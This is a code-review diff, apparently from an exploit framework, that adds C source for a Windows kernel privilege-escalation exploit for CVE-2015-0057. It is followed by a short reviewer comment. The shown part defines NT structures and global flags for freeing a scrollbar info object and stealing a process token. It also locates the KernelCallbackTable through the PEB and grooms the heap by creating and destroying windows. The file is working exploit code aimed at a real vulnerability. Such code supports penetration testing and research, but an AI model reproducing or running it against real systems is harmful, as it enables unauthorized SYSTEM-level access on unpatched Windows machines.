external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c

```diff
@@ -0,0 +1,519 @@
+	OUT  PVOID Process
+	);
+
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+	);
+
+typedef struct _LSA_UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR Buffer;
+} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
+
+typedef struct _CLIENT_ID {
+	PVOID UniqueProcess;
+	PVOID UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef struct _TEB {
+	ULONG BunchOfCrap[435];
+	ULONG Win32ClientInfo[62];
+} TEB, *PTEB;
+
+typedef struct _PROCESS_BASIC_INFORMATION {
+	PVOID Reserved1;
+	PVOID PebBaseAddress;
+	PVOID Reserved2[2];
+	ULONG_PTR UniqueProcessId;
+	PVOID Reserved3;
+} PROCESS_BASIC_INFORMATION;
+
+BOOL g_bFreeDatSbInfo = FALSE; /* flag to set for when the SBINFO should be freed */
+BOOL g_bStealDatToken = FALSE; /* flag to set for when the token should be stolen */
+HWND g_hWndTarget = NULL; /* this is the window that is attacked */
+DWORD g_dwHookCtr = 0;
+DWORD dwMyProcessId = 0;
+
+#define BACKUP_SIZE 0x90
+HANDLE g_bDataBackup[24];
+PVOID g_pStructRestore = NULL;
+
+lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
+lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
+
+PVOID get_kernel_callback_table() {
+	PROCESS_BASIC_INFORMATION BasicInformation = { 0 };
+	PVOID *pPeb = NULL;
+	PVOID pKernelCallbackTable = NULL;
+	ULONG ulReturnLength = 0;
+
+	if (pNtQueryInformationProcess(GetCurrentProcess(), 0, &BasicInformation, sizeof(PROCESS_BASIC_INFORMATION), &ulReturnLength) == ERROR_SUCCESS) {
+		pPeb = BasicInformation.PebBaseAddress;
+		pKernelCallbackTable = pPeb[11];
+		dprintf("[*] PEB address: 0x%p KernelCallbackTable 0x%p", pPeb, pKernelCallbackTable);
+	}
+	return pKernelCallbackTable;
+}
+
+void clear_simulate_activity(PSIMULATED_ACTIVITY sActivity) {
+	DWORD dwHandleCursor;
+
+	for (dwHandleCursor = 0; dwHandleCursor < SIMULATED_ACTIVITY_HANDLE_COUNT; dwHandleCursor++) {
+		DESTROY_WINDOW_IF_NOT_NULL(sActivity->hRandWindows[dwHandleCursor]);
+	}
+	return;
+}
+
+void simulate_activity(PSIMULATED_ACTIVITY sActivity) {
+	DWORD dwHandleCursor;
+
+	for (dwHandleCursor = 0; dwHandleCursor < SIMULATED_ACTIVITY_HANDLE_COUNT; dwHandleCursor++) {
+		if ((rand() % 2) == 1) {
+			if (sActivity->hRandWindows[dwHandleCursor] == NULL) {
+				sActivity->hRandWindows[dwHandleCursor] = CreateWindowEx(0, "Window 0", "Window 0", (WS_OVERLAPPED | WS_HSCROLL | WS_VSCROLL), CW_USEDEFAULT, CW_USEDEFAULT, 300, 150, NULL, NULL, NULL, NULL);
+			} else {
+				DestroyWindow(sActivity->hRandWindows[dwHandleCursor]);
+				sActivity->hRandWindows[dwHandleCursor] = NULL;
+			}
+		}
+	}
+	return;
+}
+
+// Search the specified data structure for a member with CurrentValue.
+BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+{
+	DWORD_PTR dwIndex, dwMask;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting.
+#ifdef _M_X64
+	dwMask = ~0xf;

```

Comment:
A sign that x64 is coming.. 
![Excellent](http://img.pandawhale.com/23138-excellentjpg-zryq.jpeg)